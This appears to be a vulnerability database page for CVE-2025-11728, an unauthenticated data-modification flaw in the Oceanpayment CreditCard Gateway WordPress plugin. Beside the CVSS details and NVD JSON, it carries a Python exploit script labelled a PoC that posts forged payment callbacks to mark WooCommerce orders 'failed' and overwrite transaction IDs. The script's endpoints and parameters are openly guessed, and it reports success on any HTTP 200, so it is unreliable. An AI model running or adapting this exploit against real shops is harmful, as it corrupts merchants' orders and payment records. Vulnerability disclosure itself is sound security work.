Security Vulnerability Report
中文
CVE-2025-11728 CVSS 5.3 MEDIUM

CVE-2025-11728

Published: 2025-10-15 09:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Oceanpayment CreditCard Gateway plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'return_payment' and 'notice_payment' functions in all versions up to, and including, 6.0. This makes it possible for unauthenticated attackers to update WooCommerce orders to 'failed' status, and update transaction IDs.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Oceanpayment CreditCard Gateway for WordPress <= 6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11728 PoC - Oceanpayment CreditCard Gateway Unauthorized Data Modification # This PoC demonstrates how an unauthenticated attacker can exploit # the missing authentication checks on 'return_payment' and 'notice_payment' functions import requests # Target WordPress site using the vulnerable Oceanpayment CreditCard Gateway plugin TARGET_URL = "http://target-wordpress-site.com" def exploit_return_payment(order_id, transaction_id): """ Exploit the 'return_payment' function to modify order status and transaction ID. This function is typically registered as a callback endpoint accessible without authentication. """ # The return_payment callback is usually triggered via a GET/POST request # to a specific endpoint with order parameters payload = { 'order_id': order_id, 'transaction_id': transaction_id, 'status': 'failed' } # Attempt to call the unprotected return_payment function # The endpoint may vary depending on plugin configuration endpoints = [ f"{TARGET_URL}/?wc-api=return_payment", f"{TARGET_URL}/wp-admin/admin-post.php?action=return_payment", f"{TARGET_URL}/wp-json/oceanpayment/v1/return", ] for endpoint in endpoints: try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Successfully exploited: {endpoint}") print(f"[+] Order {order_id} status changed to 'failed'") print(f"[+] Transaction ID updated to: {transaction_id}") return True except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {endpoint}: {e}") return False def exploit_notice_payment(order_id, transaction_id): """ Exploit the 'notice_payment' function (async notification handler) to modify order data without authentication. """ payload = { 'order_id': order_id, 'transaction_id': transaction_id, 'payment_status': 'failed' } endpoints = [ f"{TARGET_URL}/?wc-api=notice_payment", f"{TARGET_URL}/wp-admin/admin-post.php?action=notice_payment", f"{TARGET_URL}/wp-json/oceanpayment/v1/notice", ] for endpoint in endpoints: try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Successfully exploited: {endpoint}") print(f"[+] Order {order_id} modified via notice_payment") return True except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {endpoint}: {e}") return False if __name__ == "__main__": # Example: Target a specific WooCommerce order target_order_id = "12345" fake_transaction_id = "FAKE_TXN_999999" print("[*] CVE-2025-11728 - Oceanpayment CreditCard Gateway Exploit PoC") print(f"[*] Target: {TARGET_URL}") print(f"[*] Target Order ID: {target_order_id}") print("-" * 60) # Try exploiting return_payment function print("\n[*] Attempting to exploit 'return_payment' function...") exploit_return_payment(target_order_id, fake_transaction_id) # Try exploiting notice_payment function print("\n[*] Attempting to exploit 'notice_payment' function...") exploit_notice_payment(target_order_id, fake_transaction_id) print("\n[*] Exploit attempts completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11728", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:43.307", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Oceanpayment CreditCard Gateway plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'return_payment' and 'notice_payment' functions in all versions up to, and including, 6.0. This makes it possible for unauthenticated attackers to update WooCommerce orders to 'failed' status, and update transaction IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/oceanpayment-creditcard-gateway/trunk/class-wc-oceancreditcard.php#L489", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/oceanpayment-creditcard-gateway/trunk/class-wc-oceancreditcard.php#L594", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c560bc33-d664-433e-bfd9-e4fa1776bb76?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.